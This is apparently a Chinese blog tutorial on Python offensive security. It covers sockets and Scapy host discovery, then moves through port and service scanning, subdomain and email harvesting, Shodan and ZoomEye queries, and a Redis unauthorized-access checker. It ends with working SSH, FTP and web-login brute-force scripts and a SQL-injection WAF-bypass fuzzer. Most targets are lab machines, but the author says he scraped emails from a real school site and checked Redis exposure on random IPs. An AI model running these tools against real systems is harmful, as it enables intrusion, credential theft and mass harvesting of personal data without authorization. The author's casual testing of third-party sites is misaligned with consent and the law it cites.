网上有《Python安全攻防》📕
想深入学习的👦可以买
我没买–毕竟我喜欢白嫖🤪
⛰前言⛰
- 随着近几年互联网的发展,Python在各行各业发挥着举足轻重的作用。除应用在科学计算、大数据处理等人们熟知的领域外,在信息安全领域中使用也异常广泛。这是因为对于渗透测试工程师来说Python语言不仅上手容易,而且还有大量丰富的开源库。通过Python可以帮助他们又好又快的完成一项任务,以少量的代码便可实现所需功能。从而借助Python打造更安全的💻。
国家网络安全法
敲重点👉中华人民共和国网络安全法👈建议倒背如流
🌋正文🌋
一、Socket网络编程
套接字(Socket)是计算机之间进行通信的一种约定。通过Socket,一台计算机可以接受其他计算机的数据,也可以向其他计算机发送数据。远程管理软件和黑客软件大多依赖于Socket来实现特定功能的,其包括两个部分:运行于服务器端称之为ServerSocket,运行于客户机端称之ClientSocket。
TCP
TCP_Client.py
import socket
def main():
# 创建TCP套接字
tcp_client_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# 服务器地址
sever_ip = input("请输入服务器ip:")
sever_port = input("请输入服务器端口:")
# 连接服务器(元组)
tcp_client_socket.connect((sever_ip,int(sever_port)))
# 输入发送的数据
data = input("请输入要发送的数据:")
# 发送数据
tcp_client_socket.send(data.encode("utf-8"))
#接收数据
recv_data = tcp_client_socket.recv(1024)
print("对方的回复:"recv_data.decode("utf-8"))
if __name__ == '__main__':
main()
nc -lvp 8888
监听8888端口
(一次完整对话)
TCP_Sever.py
import socket
def main():
# 创建套接字
tcp_server_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# 绑定本地IP和端口
tcp_server_socket.bind(("192.168.12.1",8888))
# 被动 listen
tcp_server_socket.listen(128)
while True:
# 等待客户端信息
print("等待客户端连接")
client_socket,client_addr = tcp_server_socket.accept()
print("客户端为:",client_addr)
#接收对方发送数据
recv_data = client_socket.recv(1024)
print("接收到信息为:",recv_data.decode("utf-8"))
#发送数据到客户端
client_socket.send("Yasso".encode("utf-8"))
client_socket.close()
if __name__ == "__main__":
main()
UDP
UDP_Client_send.py
import socket
#创建udp套接字
udp_socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
# 目标ip和端口
target_addr = ('192.168.12.128',8888)
#获取数据
data = input("请输入要发送的数据:")
#发送数据
udp_socket.sendto(data.encode('utf-8'),target_addr)
udp_socket.close()
UDP_Client_receive.py
import socket
#创建udp套接字
udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
local_addr=('192.168.12.128',8888)
#绑定ip(必须本地)和端口
udp_socket.bind(local_addr)
#等待接受对方发送的数据
recv_data = udp_socket.recvfrom(1024) #表示本次接受的最大字节数1024
# 显示接受的数据
print(recv_data[0].decode('utf-8'))
udp_socket.close()
liunx等待接受数据->win10发送数据->liunx成功接收数据
nc -ulp 8888
监听udp模式下的8888端口
私密聊天室
# UDP应用-私密聊天室(极简)
import socket
def send(chat_ip,chat_port):
udp_socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
"""发送消息"""
address = (chat_ip,int(chat_port))
print(address)
data = input("请输入发送的消息:")
udp_socket.sendto(data.encode("utf-8"),address)
def receive():
"""接收消息"""
udp_socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
# 绑定本地IP和端口
udp_socket.bind(("192.168.12.1",8888))
recv_data = udp_socket.recvfrom(1024)
print(recv_data[0].decode('utf-8'))
def main():
chat_ip = input("请输入您聊天对方IP地址:")
chat_port = input("请输入您聊天对方端口:")
# 循环调用
while True:
print("++++++欢迎进入私密聊天室++++++")
print("0:发送消息")
print("1:接收消息")
print("2:退出聊天")
function = input("请输入您要用的模块")
if function == "0":
send(chat_ip,chat_port)
elif function == "1":
receive()
elif function == "2":
break
else:
print("输入有误,请重新输入")
if __name__ == '__main__':
main()
二、Scapy网络嗅探
pip install scapy
安装scapy
pip install ipython
安装交互式shell
Scapy是一个强大的交互式包操作程序。它能够伪造或解码大量协议的数据包,在网络上发送它们,捕获它们,匹配请求和响应,等等。Scapy可以轻松地处理大多数经典任务,如扫描、跟踪、探测、单元测试、攻击或网络发现。它可以代替hping、arpsoof、arp-sk、arping、p0f甚至Nmap、tcpdump和tshark的某些部分
TCP发送数据
TCPsend.py
# -- coding: utf-8 --
import time
import threading
import sys
from scapy.all import *
# 数据包应用层数据部分
data = 'flag{flag_is_not_here}'
# src:源地址 、sport:源端口、dst:目标地址、dport:目标端口
pkt = IP(src='192.168.12.128', dst='192.168.12.166') / TCP(sport=4444, dport=6666) / data
# 间隔一秒发送一次 总共发送5次 发送网卡口(iface):eth0
send(pkt, inter=1, count=5, iface="eth0")
基于ICMP协议的存活主机探测
判断是否为活跃主机,只需要向其发送一个ICMP请求,如果这台主机处于活跃状态,那么它在收到这个请求之后就会给出一个回应。
# -- coding: utf-8 --
from scapy.all import *
# 构造IP包头构造ICMP包头加载发送数据包函数
for i in range(1,254): # 整个个网段
ip="192.168.12."+str(i) # 设置IP地址
pkt=IP(dst=ip,src="192.168.12.128")/ICMP(type="Echo-request") #ICMP包的类型为Echo request——回显请求(Ping请求)
rep=sr1(pkt,timeout=1,verbose=False) # 发送和接受数据包,超时时间为1秒,设置无过程回显。
# 如果该数据包有回应则输出
if rep:
print("The " + rep[IP].src + " is live")
基于TCP/UDP的主机发现
TCP
工作原理主要依据目标主机响应数据包中flags字段,如果flags字段有值,则表示主机存活,该字段通常包括SYN、FIN、ACK、PSH、RST、URG六种类型。SYN表示建立连接,FIN表示关闭连接,ACK表示应答,PSH表示包含DATA数据传输,RST表示连接重置,URG表示紧急指针。
# -- coding: utf-8 --
from scapy.all import *
for i in range(1,254): # 整个个网段
ip="192.168.12."+str(i) # 设置IP地址
pkt=IP(dst=ip)/TCP(flags="A",dport=4444) #响应数据包中flags值判断主机是否存活
rep=sr1(pkt,timeout=1,verbose=False) # 发送和接受数据包,超时时间为1秒,设置无过程回显。
if rep:
# 如果该数据包有相应则输出
print("The " + rep[IP].src + " is live")
UDP
UDP是向目标主机一个没有开放的端口发送数据,目标主机会返回一个目的端口不可达的ICMP报文,以此来判断主机是否在线。如果主机不在线,或者目标端口开放,UDP探测是不会收到响应包的。
# -- coding: utf-8 --
from scapy.all import *
for i in range(1,254): # 整个个网段
ip="192.168.12."+str(i) # 设置IP地址
pkt=IP(dst=ip)/UDP(dport=6666)
rep=sr1(pkt,timeout=1,verbose=False) # 发送和接受数据包,超时时间为1秒,设置无过程回显。
if rep:
# 如果该数据包有相应则输出
print("The " + rep[IP].src + " is live")
wireshark拦截
基于ARP协议的主机发现
ARP
对以太网内的每个主机都进行ARP请求。若主机存活,则会响应我们的ARP请求,否则不会响应.因为ARP涉及网络层和数据链路层所以需要使用Scapy中的Ether和ARP。
# -- coding: utf-8 --
from scapy.all import *
for i in range(1,254): # 整个个网段
ip_list=[]
ip="192.168.12."+str(i) # 设置IP地址
# 发送ARP包
# 二层发包,需要添加以太网头部,所以要写成Ether/ARP
# 因为最底层用到了二层,所以要用srp()发包
ans=srp(Ether(dst='FF:FF:FF:FF:FF:FF')/ARP(op=1,pdst=ip,hwdst='00:00:00:00:00:00'),timeout=1,verbose=False)
if ans[0].res:
print("The "+ip+" is live")
三、信息搜集
IP查询
import socket
domain = input("请输入要查询的域名:")
ip = socket.gethostbyname(domain)
print("IP地址为:",ip)
Whois查询
pip install python-whois
安装模块
from whois import whois
data = whois('www.baidu.com')
print(data)
子域名挖掘
import requests
from bs4 import BeautifulSoup
from urllib.parse import urlparse
import sys
def bing_search(site,pages):
Subdomain = []
headers = { #HTTP Headers是HTTP请求和相应的核心,它承载了关于客户端浏览器,请求页面,服务器等相关的信息
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36', #是HTTP协议中的一部分,属于头域的组成部分,是一种向访问网站提供你所使用的浏览器类型、操作系统及版本、CPU 类型、浏览器渲染引擎、浏览器语言、浏览器插件等信息的标识
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',#属于请求报头,代表发送端(客户端)希望接受的数据类型
'Referer': "https://cn.bing.com", #表示一个来源
}
for i in range(1,int(pages)+1):
url = "https://cn.bing.com/search?q=site%3a"+site+"&go=Search&qs=ds&first="+ str((int(i)-1)*10) +"&FORM=PERE"
html = requests.get(url,headers=headers) #获取HTML网页,对应HTTP的GET
soup = BeautifulSoup(html.content,'html.parser')
job_bt = soup.findAll('h2') #返回一个包含HTML文档标题标签h2的列表
for i in job_bt:
link = i.a.get('href')
domain = str(urlparse(link).scheme + "://" +urlparse(link).netloc) #储存子域名
if domain in Subdomain:
pass
else:
Subdomain.append(domain)
print(domain)
if __name__ == '__main__':
if len(sys.argv) == 3:
site = sys.argv[1]
page = sys.argv[2]
else:
print("usage: %s baidu.com 10" % sys.argv[0]) #输出帮助信息
sys.exit(-1)
Subdomain = bing_search(site,page)
python Subdomain.py baidu.com 20
数字20表示获取Ping引擎页数
力推👉️在线子域名查询👈️
邮件爬取
import sys
import getopt
import requests
from bs4 import BeautifulSoup
import re
#主函数,传入用户输入的参数
def start(argv):
url = ""
pages = ""
if len(sys.argv) < 2:
print("-h 帮助信息;\n")
sys.exit()
#定义异常处理
try:
banner()
opts,args = getopt.getopt(argv,"-u:-p:-h")
except getopt.GetoptError:
print('Error an argument!')
sys.exit()
for opt,arg in opts:
if opt == "-u":
url = arg
elif opt == "-p":
pages = arg
elif opt == "-h":
print(usage())
launcher(url,pages)
#banner信息
def banner():
print('\033[0;31;42m 爬虫不控频,亲人两行泪 \033[0m')
#使用规则
def usage():
print('-h: --help 帮助;')
print('-u: --url 域名;')
print('-p: --pages 页数;')
print('eg: python -u "www.baidu.com" -p 100' + '\n')
sys.exit()
#漏洞回调函数
def launcher(url,pages): #调用bing_search()和baidu_search()函数并且将bing爬到的和baidu爬到的合并去重
email_num = []
key_words = ['email','mail','mailbox','邮件','邮箱','postbox']
for page in range(1,int(pages)+1):
for key_word in key_words:
bing_emails = bing_search(url,page,key_word)
baidu_emails = baidu_search(url,page,key_word)
sum_emails = bing_emails + baidu_emails
for email in sum_emails:
if email in email_num:
pass
else:
print(email)
with open('data.txt','a+') as f:
f.write(email + '\n')
email_num.append(email)
#bingSearch
def bing_search(url,page,key_word): #绕过Bing搜索引擎反爬(校验referer和cookie)
referer = "http://cn.bing.com/search?q=email+site%3abaidu.com&qs=n&sp=-1&pq=emailsite%3abaidu.com&first=1&FORM=PERE1"
conn = requests.session()
bing_url = "https://cn.bing.com/search?q="+key_word+"site%3a"+url+"&qs=n&sp=-1&pq="+key_word+"site%3a"+url+"&first="+str((page-1)*10)+"&FORM=PERE1"
conn.get('http://cn.bing.com',headers=headers(referer))
r = conn.get(bing_url,stream=True,headers=headers(referer),timeout=8)
emails = search_email(r.text)
return emails
#baiduSearch
def baidu_search(url,page,key_word): #绕过百度搜索引擎的反爬(JS请求链)
email_list = []
emails = []
referer = "https://www.baidu.com/s?wd=email+site%3Abaidu.com&pn=1"
baidu_url = "https://www.baidu.com/s?wd="+key_word+"+site%3A"+url+"&pn="+str((page-1)*10)
conn = requests.session()
conn.get(referer,headers=headers(referer))
r = conn.get(baidu_url, headers=headers(referer))
soup = BeautifulSoup(r.text, 'lxml')
tagh3 = soup.find_all('h3')
for h3 in tagh3:
href = h3.find('a').get('href')
try:
r = requests.get(href, headers=headers(referer),timeout=8)
emails = search_email(r.text)
except Exception as e:
pass
for email in emails:
email_list.append(email)
return email_list
def search_email(html):
emails = re.findall(r"[a-z0-9\.\-+_]+@[a-z0-9\.\-+_]+\.[a-z]+",html,re.I) #正则表达式获取邮箱号码
return emails
def headers(referer):
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36',
'Accept': '*/*',
'Accept-Language':'en-US,en;q=0.5',
'Accept-Encoding':'gzip,deflate',
'Referer':referer}
return headers
if __name__ == '__main__':
#定义异常
try:
start(sys.argv[1:])
except KeyboardInterrupt:
print("interrupted by user,killing all threads...")
试了下某学校网站,爬到不少
溜了溜了🎿🎿
端口扫描
import socket
import threading
def main(target):
print('开始扫描---')
for port in range(1,65535):
t = threading.Thread(target=hackport,args=(target,port))
t.start()
def hackport(target,port):
try:
res = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
res.connect((target,port)) #双括号元组
print("%s:%d 端口开放"%(target,port))
res.close()
except:
pass
if __name__ == '__main__':
target= input("请输入要扫描的IP:")
main(target)
print('***扫描完毕***')
内网靶机
nmap -sV -p- 192.168.12.134
服务识别
from optparse import OptionParser
import time
import socket
import os
import re
SIGNS = (
# 协议 | 版本 | 关键字
b'FTP|FTP|^220.*FTP',
b'MySQL|MySQL|mysql_native_password',
b'oracle-https|^220- ora',
b'Telnet|Telnet|Telnet',
b'Telnet|Telnet|^\r\n%connection closed by remote host!\x00$',
b'VNC|VNC|^RFB',
b'IMAP|IMAP|^\* OK.*?IMAP',
b'POP|POP|^\+OK.*?',
b'SMTP|SMTP|^220.*?SMTP',
b'Kangle|Kangle|HTTP.*kangle',
b'SMTP|SMTP|^554 SMTP',
b'SSH|SSH|^SSH-',
b'HTTPS|HTTPS|Location: https',
b'HTTP|HTTP|HTTP/1.1',
b'HTTP|HTTP|HTTP/1.0',
)
def regex(response, port):
text = ""
if re.search(b'<title>502 Bad Gateway', response):
proto = {"Service failed to access!!"}
for pattern in SIGNS:
pattern = pattern.split(b'|')
if re.search(pattern[-1], response, re.IGNORECASE):
proto = "["+port+"]" + " open " + pattern[1].decode()
break
else:
proto = "["+port+"]" + " open " + "Unrecognized"
print(proto)
def request(ip,port):
response = ''
PROBE = 'GET / HTTP/1.0\r\n\r\n'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(10)
result = sock.connect_ex((ip, int(port)))
if result == 0:
try:
sock.sendall(PROBE.encode())
response = sock.recv(256)
if response:
regex(response, port)
except ConnectionResetError:
pass
else:
pass
sock.close()
def main():
parser = OptionParser("Usage:%prog -i <target host> ") # 输出帮助信息
parser.add_option('-i',type='string',dest='IP',help='specify target host') # 获取ip地址参数
parser.add_option('-p', type='string', dest='PORT', help='specify target host') # 获取ip地址参数
options,args = parser.parse_args()
ip = options.IP
port = options.PORT
print("Scan report for "+ip+"\n")
for line in port.split(','):
request(ip,line)
time.sleep(0.2)
print("\nScan finished!....\n")
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("interrupted by user, killing all threads...")
系统识别
from optparse import OptionParser
import os
import re
def main():
parser = OptionParser("Usage:%prog -i <target host>")
parser.add_option('-i', type='string', dest='IP', help='specify target host')
options, args = parser.parse_args()
ip = options.IP
ttl_scan(ip)
def ttl_scan(ip):
ttlstrmatch = re.compile(r'ttl=\d+') #正则匹配取出TTL值
ttlnummatch = re.compile(r'\d+')
result = os.popen("ping -c 1 "+ip) # 调用os.popen()函数执行ping命令
res = result.read()
for line in res.splitlines():
result = ttlstrmatch.findall(line)
if result:
ttl = ttlnummatch.findall(result[0])
if int(ttl[0]) <= 64: # ttl值小于等于64时,操作系统为linux系统
print("%s is Linux/Unix" % ip)
else: #否则就是windows
print("%s is Windows" % ip)
break
else:
pass
if __name__ == '__main__':
main()
敏感目录探测
#-*- coding:utf-8 -*-
import requests
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0"
}
url = input("url: ")
txt = input('字典.txt') # 同级目录下的字典
url_list = []
if txt == "":
txt = "字典.txt"
try:
with open(txt, 'r') as f:
url_list = f.read().split('\n')
except:
print("error")
for li in url_list:
conn = "http://"+ url + "/" + li
try:
response = requests.get(conn, headers=headers)
print("%s --------------- %s" % (conn, response))
except:
# print("%s --------------- %s" % (conn, e.code))
pass
四、网络空间搜索引擎
平常用fofa,不过貌似最近摊上事了,域名被列入了黑名单
网络空间搜索引擎🕷️能够帮助安全研究人员针对APT组织、攻击方式等情况进行分析;对于公司安全管理人员🧑💻,能够帮助他们进行网络资产匹配、安全评估等;对于安全白帽子,能够帮助渗透测试人员在与目标非交互的情况下搜集信息,例如,搜索资产、系统类型,开放端口等。
Quake网络空间测绘系统(360)
资产狩猎框架-AssetsHunter
Censys搜索引擎
Zoomeye(钟馗之眼)
Shodan(撒旦)
Zoomeye(钟馗之眼)
语法 | 描述 | 实例 |
---|---|---|
app:组件名 | 组件名称 | app:“Apache httpd” |
ver:组件版本 | 组件的版本号 | ver:“2.2.16” |
port:端口号 | 目标系统开放端口 | port:3389 |
os:操作系统 | 目标操作系统类型 | os:linux |
service:服务名 | 系统运行的服务类型 | service:“ssh” |
hostname:主机名 | 目标系统的主机名 | hostname:google.com |
country:国家或者地区代码 | 目标系统的地理位置 | country:US |
city:城市名称 | 目标系统所在城市 | city:“beijing” |
ip:指定的IP地址 | 目标系统对应的IP地址 | ip:8.8.8.8 |
org:组织结构 | 所属的组织结构 | org:“Vimpelcom” |
asn:自治系统号 | 自治系统编号 | asn:42839 |
ssl:SSL证书 | SSL证书 | ssl:“corp.google.com” |
语法 | 描述 | 实例 |
---|---|---|
app:组件名 | 组件名称 | app:“Apache httpd” |
ver:组件版本 | 组件的版本号 | ver:“2.2.16” |
site:网站域名 | 目标网站域名 | site:google.com |
os:操作系统 | 目标操作系统类型 | os:linux |
title:页面标题 | 网站标题 | site:Nginx |
kewords:页面关键字 | 网站页面关键字 | keywords:Nginx |
desc:页面说明 | 页面描述字段 | desc:Nginx |
headers:请求头部 | HTTP请求中的Headers | headers:Server |
country:国家或者地区代码 | 目标系统的地理位置 | country:US |
city:城市名称 | 目标系统所在城市 | city:“beijing” |
ip:指定的IP地址 | 目标系统对应的IP地址 | ip:8.8.8.8 |
org:组织机构 | 所属的组织机构 | org:“Vimpelcom” |
asn:自治系统号 | 自治系统编号 | asn:42839 |
调用ZoomEye(钟馗之眼)的API接口实现自动化信息搜集
ZoomEye-API 分为两种验证方式,API-KEY 和登录验证
ZoomEye API手册
curl -X POST https://api.zoomeye.org/user/login -d '{"username": "28********@qq.com","password": "123456"}'
使用host方法,查询开放6379端口的服务器IP地址,并打印出检索到的lP地址和端口号
import requests
import json
from bs4 import BeautifulSoup
data_info = {'username':"z***@qq.com",'password':"P******X"}
respond1= requests.post(url = 'https://api.zoomeye.org/user/login',json = data_info)
authorization = {'Authorization' : 'JWT ' +"eyJhbGciOiJIU***kpXVCJ9.eyJpZGVudG*MzA1***********mJmIjoxN*I-ZMB0zG*tPZK11FCo"}
url = "https://api.zoomeye.org/host/search?query=port:6379&page=1&facet=app,os"
respond = requests.get(url = url,headers = authorization)
data = json.loads(respond.text)
for line in data['matches']:
print(line['ip']+': '+str(line['portinfo']['port']))
Shodan
语法 | 描述 | 实例 |
---|---|---|
city:城市名称 | 城市 | city:“beijing” |
country:国家或者地区代码 | 国家的简称 | countIy:“CN” |
geo:经纬度 | 经纬度 | geo:“46.9481,7.4474” |
hostname:主机名 | 主机名或域名 | hostname:“baidu” |
ip:IP地址 | IP地址 | ip:“11.11.11.11” |
isp: ISP供应商 | ISP供应商 | isp:“China Telecom” |
org:组织或者公司 | 组织或者公司 | org:“baidu” |
os:操作系统 | 操作系统 | os:Windows 7 or 8 |
port:端口号 | 端口号 | port:80 |
net:CIDR格式的IP地址 | CIDR格式的IP地址 | net:“190.30.40.0/24” |
versjon:软件版本号 | 软件版本 | version:“4.4.2” |
vuln:漏洞编号 | 漏洞CVE编号 | vuln:CVE-2020-0787 |
http.server:服务类型 | http请求返回中server的类型 | http.server:apache |
http.status:请求状态码 | http请求返回响应码的状态 | http.stams:200 |
调用Shodan的API接口实现自动化信息搜集
Shodan API官方文档
import shodan
import json
Shodan_API_KEY = 'q************************0'
shodan_api = shodan.Shodan(Shodan_API_KEY)
# ip = shodan_api.host('8.8.8.8') # host()方法获取指定IP的相关信息
# 搜索JAWS摄像头,并将IP和端口打印出来
results = shodan_api.search('JAWS/1.0')
print("共有%s"%results['total']+"条搜索结果")
for result in results['matches']:
print(result['ip_str']+":"+str(result['port']))
小结🌇
五、漏洞检测与防御
Redis未授权访问漏洞
通过手工🛠进行未授权访问验证,在安装Redis服务的Kall系统中连接☌,如果目标系统存在未授权访问漏洞,则可以成功连接☌
redis-cli -h 192.168.12.128
在本地搭建的redis漏洞环境
keys *
查看key和其对应的值
get user
获取用户名
get password
获取登录指令
flushall
删除所有数据
info
返回关于 Redis 服务器的各种信息和统计数值
Python批量检测Redis未授权访问漏洞
import sys
import socket
'''
socket连接远程主机的IP及端口号,发送info命令.利用recvdata()函数接收目标
主机返回的数据,当时返回的数据含有'redis verslon'字符串时,表明存在未授权访问漏
洞,否则不存在.
'''
# 随便找了几个ip测试下
with open('redis.txt',"r") as f:
url= f.read()
def main():
for ip in url.split():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1) # 限制超时1秒
s.connect((ip,6379))
s.send('INFO\r\n'.encode('utf-8')) # info命令返回服务器版本
recv_data= s.recv(1024)
if "redis_version" in recv_data.decode('utf-8'):
print(ip+":存在Redis未授权访问漏洞")
else:
pass
s.close()
f.close()
if __name__ == '__main__':
main()
⛸️⛸️⛸️⛸️⛸️⛸️
漏洞防御与检测
Redis未授权访问漏洞产生的危害☠︎☠︎☠︎很大,甚至可以批量获取目标系统的权限,有必要针对该漏洞进行严格限制和防御。针对该漏洞的防御方式有很多,下面是常见的🛡︎🛡︎🛡︎方式:
1️⃣禁止远程使用高危命令。
2️⃣低权限运行Redis服务。
3️⃣禁止外网访问Redis。
4️⃣阻止其他用户👤添加新的公钥,将authorized-keys的权限设置为对拥有者只读。
六、数据加密
常见的对称加密算法包括DES、AES等
Python实现DES加解密
通过Cryptodome库函数实现对字符串进行DES加解密。由于DES为分组密码的加密方式,其工作模式有五种: ECB、CBC、CTR、CFB、OFB
from Crypto.Cipher import DES
import binascii
key = '12345678' # 密钥
des = DES.new(key.encode('utf-8'),DES.MODE_ECB) # ECB模式
text = input("请输入要加密的字符串:") # 要加密的字符串
text = text + (8-(len(text)%8)) * '=' # 数据块对齐
# 加密
encrypt_text = des.encrypt(text.encode('utf-8')) #
Result1 = binascii.b2a_hex(encrypt_text) # 字符串转为16进制
print("DES加密后:"+str(Result1))
# 解密
decrypt_text = binascii.a2b_hex(Result1)
Result2 = des.decrypt(decrypt_text)
print("DES解密后:"+str(Result2))
Python实现AES加解密
AES为分组密码的加密方式,其工作模式有五种: ECB、CBC、CTR、CFB、OFB.
from Crypto.Cipher import AES
import binascii
key = 'abcdefghabcdefgh' # 密钥长度须为8字节
aes = AES.new(key.encode(),AES.MODE_ECB) # ECB模式
text = input("请输入要加密的字符串:") # 要加密的字符串需为8字节的倍数
text = text + (16-(len(text)%16)) * '=' # 数据块对齐
# 加密
encrypt_text = aes.encrypt(text.encode())
Result1 = binascii.b2a_hex(encrypt_text) # 字符串转为16进制
print("AES加密后:"+str(Result1))
# 解密
decrypt_text = binascii.a2b_hex(Result1) # 16进制转为字符串
Result2 = aes.decrypt(decrypt_text)
print("AES解密后:"+str(Result2))
Python实现MD5加密
用Python实现MD5加密时用到的是hashlib模块,可以通过hashlib标准库使用多种Hash算法,如SHA1、SHA224、SHA256、SHA384、SHA512和MD5算法等。
from hashlib import md5
def main(s):
new_md5 = md5()
new_md5.update(s.encode('utf-8'))
print(new_md5.hexdigest())
if __name__ == '__main__':
main(input("请输入要加密的字符串:"))
七、身份认证
Python社工字典生成
import itertools
def ReadInformationList(infolist):
for i in range(1,3):
lines = input('请输入第%s个关键字:'%i)
infolist.append(lines.strip())
def CreateNumberList(numberList):
words = "0123456789"
itertoolsNumberList = itertools.product(words,repeat=2) # 所有两位数
for number in itertoolsNumberList:
numberList.append("".join(number))
def CreateSpecialList(specialList):
specialWords = "~!@#$%^&*()_+`-=,/:><.\|" # 特殊字符
for i in specialWords:
specialList.append("".join(i))
# 创建Combinatjon()函数字典生成算法主体 可自定义组合算法
# 关键字与两位数和一位特殊字符组合
def main(dictionaryFile):
for a in range(0,len(infolist)):
for b in range(0, len(numberList)):
for c in range(0,len(specialList)):
dictionaryFile.append(infolist[a] + numberList[b] + specialList[c])
dictionaryFile.append(infolist[a] + specialList[c] + numberList[b])
dictionaryFile.append(specialList[c] + infolist[a] + numberList[b])
dictionaryFile.append(specialList[c] + numberList[b] + infolist[a])
dictionaryFile.append(numberList[b] + infolist[a] + specialList[c])
dictionaryFile.append(numberList[b] + specialList[c] + infolist[a])
for i in dictionaryFile:
print(i)
if __name__ == '__main__':
infolist =[]
ReadInformationList(infolist)
numberList = []
CreateNumberList(numberList)
specialList = []
CreateSpecialList(specialList)
dictionaryFile = []
main(dictionaryFile)
Python后台弱口令爆破
DVWA靶场 根据返回数据包的不同---💣成功与否,关键在于📕是否强大
import requests
def get_user(user):
a = open('username.txt','r')
for i in a:
user.append(i.strip())
def get_psd(psd):
b = open('password.txt','r')
for i in b:
psd.append(i.strip())
def main():
cookiesDit = {
'security':'low',
'PHPSESSID':'ridh5ntp6u7ua2lisb1469c2r4'
}
for c in user:
for d in psd:
url = 'http://127.0.0.1/dvwa/vulnerabilities/brute/?username={}&password={}&Login=Login'.format(c,d)
responses = requests.get(url,cookies=cookiesDit)
if 'Welcome to the password' in responses.text:
print("success!!! 用户名:{},密码:{}".format(c,d))
if __name__ == '__main__':
user = []
get_user(user)
psd =[]
get_psd(psd)
main()
SSH暴力破解
SSH主要应用于类UNIX系统中,从客户端来看, SSH提供两种级别的安全验证:1️基于密码的安全验证、2️⃣基于密钥🗝️的安全验证.
from pexpect import pxssh
import optparse
from threading import *
Max_Connect = 5
connection_lock = BoundedSemaphore(value=Max_Connect) # BoundedSemaphore 限制多进程访问
def connect(host, user, password):
try:
s = pxssh.pxssh() #pxssh不支持Windows
s.login(host, user, password)
print("[+]Password Found:"+password)
Found = True
except Exception as e:
pass
def main():
parser = optparse.OptionParser('usage %prog -H <target host> -f <passwd file> -u <username>')
parser.add_option('-H', dest='host', type='string', help='target host')
parser.add_option('-f', dest='passwdfile',type='string', help='passwofile')
parser.add_option('-u', dest='user', type='string', help='login username')
(options,args) = parser.parse_args()
host = options.host
passwdfile = options.passwdfile
user = options.user
if host==None or passwdfile==None or user==None:
print(parser.usage)
exit(0)
mn = open(passwdfile,'r')
lines = mn.readlines()
for line in lines:
with connection_lock:
password = line.strip('\n')
print('[-] Test:'+str(password))
t = Thread(target=connect,args=(host, user, password))
t.start()
if __name__ == '__main__':
main()
FTP暴力破解
import ftplib
# 检查FTP是否允许匿名账户登录
def CheckFTP_login(hostname):
f = ftplib.FTP(hostname)
try:
print('[-] checking user [anonymous] with password [anonymous]')
f.connect(hostname,21,timeout=10)
f.login()
print("\n[+] Credentials have found succcessfully.")
print("\n[+] Username:anonymous")
print("\n[+] Password:anonymous")
print("success!!!username:{},password:{}".format("anonymous","anonymous"))
f.quit()
except ftplib.all_errors:
print("\n[+] Anonymous login is prohibited!!!")
pass
# 爆破用户名和密码
def violence_Login(hostname):
ftp=ftplib.FTP(hostname)
u=open('ftp_user.txt','r')
lines_user=u.readlines()
usernameList = []
for m in lines_user:
usernameList=[' '.join([n.strip() for n in usr.strip().split('\t')]) for usr in lines_user]
p=open('ftp_pwd.txt','r')
lines_psd=p.readlines()
passwordList = []
for m in lines_psd:
passwordList=[' '.join([n.strip() for n in psd.strip().split('\t')]) for psd in lines_psd]
for user in usernameList:
for pasw in passwordList:
try:
if ftp.login(user,pasw):
print("\n[+] success!!! username:{},password:{}".format(user,pasw))
ftp.quit()
except:
pass
CheckFTP_login('192.168.12.131')
violence_Login('192.168.12.131')
1️⃣允许匿名登录
2️⃣禁止匿名登录
八、Fuzz测试
Python绕过安全狗
安全狗版本为v4.0 Apache版 + 本地DVWA-SQL Injection
常见的绕过安全🐶的方式有4种:利用string绕过、利用User-agent绕过、利用MySQL语法和html的特殊性绕过、利用畸形数据包绕过。
判断返回的页面是否为安全🐶拦截显示的页面,使用页面中返回的
攻击请求进行判断,不存在这4个字,则表示已经绕过了安全狗。
import requests
import sys
fuzz_x = ['/*','*/','/*!','/**/','?','/','*','=','`','!','@','%','_','-','+','|','%00']
fuzz_y = ['',' ']
fuzz_z = ["%0a","%0b","%0c","%0d","%0e","%0f","%0g"]
fuzz = fuzz_x+fuzz_y+fuzz_z
headers = {
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
"Cookie": "security=low; PHPSESSID=6l0tittmdhgtpiktaffs9rqnvp"
}
url_start = "http://192.168.12.131/dvwa/vulnerabilities/sqli/?id=1"
len = len(fuzz)**3
num = 0
#组合
for a in fuzz:
for b in fuzz:
for c in fuzz:
num += 1
payload = "'/**//*!*/and/*!*/"+a+b+c+"/**/'1'='1"
url = url_start + payload+"&Submit=Submit#"
sys.stdout.write(' '*30 +'\r')
sys.stdout.flush()
print("Now URL:"+url)
sys.stdout.write("完成进度:%s/%s \r" %(num,len))
sys.stdout.flush()
res = requests.get(url = url,headers = headers)
if "攻击请求" not in res.text:
print("\033[0;33m[*]Find BypassWAF Payload:\033[0m"+url)
🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌🐌
九、Scapy进劫
ARP毒化
以太网协议规定,同—局域网中的一台💻要和另一台💻进行直接通信,必须知道目标主机的MAC地址。而在TCP/IP中,网络层只关注目标主机的IP地址,这就导致在以太网中使用IP协议时,数据链路层的以太网协议接收到网络层的IP协议提供的数据中,只包含目的主机的IP地址,于是需要ARP来完成IP地址到MAC地址的转换。
